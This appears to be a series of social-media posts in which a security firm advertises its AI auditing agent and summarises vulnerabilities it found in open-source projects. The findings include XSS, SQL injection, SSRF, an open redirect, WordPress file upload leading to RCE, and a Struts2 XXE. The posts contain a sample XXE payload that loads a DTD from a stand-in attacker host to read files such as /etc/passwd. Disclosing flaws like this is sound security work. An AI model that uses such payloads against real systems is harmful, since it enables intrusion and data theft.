ZAST Agent has identified 14 vulnerabilities in pybbs (tomoya92/pybbs, 2.9k+ GitHub Stars).

The attack surface includes 8 XSS vectors, CSRF on admin endpoints, and CAPTCHA reuse. Traditional SAST, which focuses on pattern matching, does not analyze logic flaws like email bypass or multi-stage flows (Stored XSS via /api/settings).

Our engine verified every attack path—from payload persistence to triggering admin-level execution—via executable PoCs. This minimizes the triage effort required for these validated findings.

Repo: https://github.com/tomoya92/pybbs

Full Technical Details: https://blog.zast.ai/cybersecurity/product%20updates/When-Your-Forum-Has-More-Holes-Than-Swiss-Cheese-A-Case-Study-in-pybbs-Security/

#AppSec #ZAST #VulnerabilityResearch #Java #XSS

ZAST Agent just verified an Open Redirect in Busy (busy-org/busy, 2.4k+ GitHub Stars).

The vulnerability targets the /callback endpoint where the state parameter is used as a redirect sink. While the code attempts to sanitize input by checking for a leading /, it fails to account for protocol-relative URLs (e.g., //attacker.com).

Our engine verified the full attack chain—generating the access_token bypass and confirming the 302 redirection via an Executable PoC. No grep-based guessing, just verified logic flaws.

Repo: https://github.com/busy-org/busy

Full Technical Details: https://github.com/busyorg/busy/issues/2287

#AppSec #ZAST #VulnerabilityResearch #Phishing #OpenRedirect

ZAST Agent just dropped 7 CVEs (2026-1169 to 1175) on Prime CMS (birkir/prime, 1.7k+ GitHub Stars).

While traditional tools are busy pattern-matching, our autonomous engine verified 0-day DoS amplification and schema disclosure via executable PoCs. Prime's GraphQL implementation allows field duplication (5,000x __typename) and GET-based CSRF because it lacks query cost analysis and transport security.

This isn't a "potential" scan result. Our agent confirmed these by actually hitting the endpoint and verifying the resource exhaustion. No fluff, just verified 0-days.

Repo: https://github.com/birkir/prime

Full report: https://blog.zast.ai/security%20research/Security-Advisory-7-Unpatched-Vulnerabilities-in-Prime-(CMS)-GraphQL-Implementation/

#AppSec #GraphQL #CVE #ZAST #CyberSecurity

Our AI Agent recently audited Slider Future (1,000+ active installations) and identified a critical Unauthenticated RCE, now designated as CVE-2026-1405.

While pattern-matching approaches are effective at identifying broad code signatures, this specific vulnerability resides in the logical flow of the REST API.

The endpoint /upload-image/ allows unauthenticated access because the permission_callback is set to __return_true.

Check detail here:https://www.cve.org/CVERecord?id=CVE-2026-1405

@wordpress@lemmy.world @WordPress @wordfence

#AppSec #ZAST #VulnerabilityResearch #WordPress #RCE

Alert: Unauthenticated Arbitrary File Upload leading to RCE.
ZAST engine has identified a critical-severity vulnerability, CVE-2026-1405 (CVSS 9.8), in the Slider Future WordPress plugin. This flaw allows for Unrestricted Arbitrary File Upload, leading to full Remote Code Execution (RCE).

Key Technical Findings:
- Vulnerability: Unauthenticated Arbitrary File Upload to RCE
- Project Popularity: 1,000+ active installations.
- Verification: 100% verified via Autonomous PoC generation.

The vulnerability stems from a lack of authentication on the /wp-json/slider-future/v1/upload-image/ endpoint and a total absence of file type or content validation before writing to disk.

We have verified that an attacker can upload a malicious PHP script and gain control of the host server in seconds.

Check detail here:https://www.cve.org/CVERecord?id=CVE-2026-1405

@wordpress@lemmy.world @WordPress @wordfence

#AppSec #ZAST #VulnerabilityResearch #WordPress #RCE

Dropped CVE-2026-1050 in Digital-Infrastructure (<= 9.6.7).

Classic SQL Injection via /server-platform/services/rest/auth/authenticate3. The tenantShortName parameter hits Y9PlatformUtil and triggers raw concatenation: select ... where t.SHORT_NAME=' + input
ZAST verified via sqlmap-style payload. No prepared statements used.

Vulnerability details: https://github.com/risesoft-y9/Digital-Infrastructure/issues/2

#SQLi #CVE #AppSec #Infosec #ZAST

ZAST Security Advisory: Critical SSRF Resolved in ClawdBot.

While the community focused on general configuration risks, ZAST verified the actual code.

Our engine autonomously identified a high-severity SSRF vulnerability exploitable via DNS Rebinding. The flaw was a classic TOCTOU (Time-of-Check to Time-of-Use) gap, allowing attackers to bypass validation and access internal networks.

The Resolution: Our Co-founder @beach reported this to the maintainer @steipete, who acknowledged the issue and pushed a fix immediately.

The project has now implemented DNS Pinning to eliminate the vector. We are proud to be credited in the changelog for securing the ecosystem.

View the official fix: https://github.com/clawdbot/clawdbot/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505

#AppSec #CyberSecurity #SSRF #Clawdbot #OpenSource #ZAST

Ran ZAST on ClawdBot amidst the recent hype.

Found a DNS Rebinding vector leading to full SSRF. The Logic: Classic TOCTOU. validate(url) -> OK -> fetch(url) -> Rebind -> Internal Access.

We reported to @steipete, he fixed via DNS Pinning. Acked in changelog.

Fix/Commit: https://github.com/clawdbot/clawdbot/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505

Always pin your DNS results if you fetch user-supplied URLs.

#AppSec #SSRF #ClawdBot #ZAST #ZeroDay

We verified a Stored XSS (CVE-2026-0693) in the "Allow HTML in Category Descriptions" @WordPress plugin.

The Flaw: The plugin correctly restricts input but unintentionally removes global output filters (wp_kses_data) for all users. The Impact: Malicious scripts in category descriptions execute for any visitor. The Validation: Confirmed via autonomous PoC.

Security requires validating the full data lifecycle, not just lines of code.

Vulnerability details: https://www.cve.org/CVERecord?id=CVE-2026-0693
@wordfence @cve @zoomeye_team

#WordPressSecurity #AppSec #ZAST

CVE-2025-68493: Apache Struts2 XWork-Core XXE

Technical Breakdown: Our AI agent - ZAST.AI uncovered an XXE flaw in com.opensymphony.xwork2.util.DomHelper.parse(). The root cause is a raw SAXParserFactory initialization that lacks security feature flags: factory.setFeature("http://xml.org/sax/features/external-general-entities", false); // MISSING

Attack Vector: By manipulating the InputSource, an attacker can inject a malicious DTD.
- Payload: <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
- Result: Full LFI (e.g., /etc/passwd, win.ini) and SSRF capabilities.

Status: Assigned CVE-2025-68493.

Affects Struts2 <= 6.0.3. Patching is critical.

🔗 Vulnerability reports: https://cwiki.apache.org/confluence/display/WW/S2-069

#XXE #CyberSecurity #ZAST #CVE #ApacheStruts2